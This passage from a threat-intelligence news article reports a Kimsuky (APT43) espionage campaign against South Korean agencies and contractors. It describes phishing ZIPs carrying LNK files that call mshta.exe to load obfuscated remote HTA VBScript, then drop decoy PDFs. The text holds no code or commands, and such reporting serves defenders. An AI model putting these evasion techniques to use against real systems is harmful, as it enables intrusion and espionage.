Kimsuky APT Uses LNK Files to Deploy Reflective Malware and Evade Windows Defender

The North Korean state-sponsored group Kimsuky, also known as APT43, Thallium, and Velvet Chollima, has been accused of launching a recent cyber-espionage campaign in which the attackers used malicious Windows shortcut (LNK) files as the first point of entry to breach South Korean government agencies, defense contractors, and research institutions.

The operation begins with phishing emails containing ZIP archives that embed these LNK files, disguised as legitimate documents.

Upon execution, the LNK file invokes mshta.exe to load a remote HTML Application (HTA) file from a Content Delivery Network (CDN), which contains heavily obfuscated VBScript.

This script employs decimal and hexadecimal conversions via CLng and Chr functions to construct strings for URLs and commands, effectively bypassing static analysis and endpoint detection.

Sophisticated Infection Chain

According to the report, the malware then downloads a decoy PDF lure, such as repurposed South Korean government notices about sex offenders or tax penalties, to ...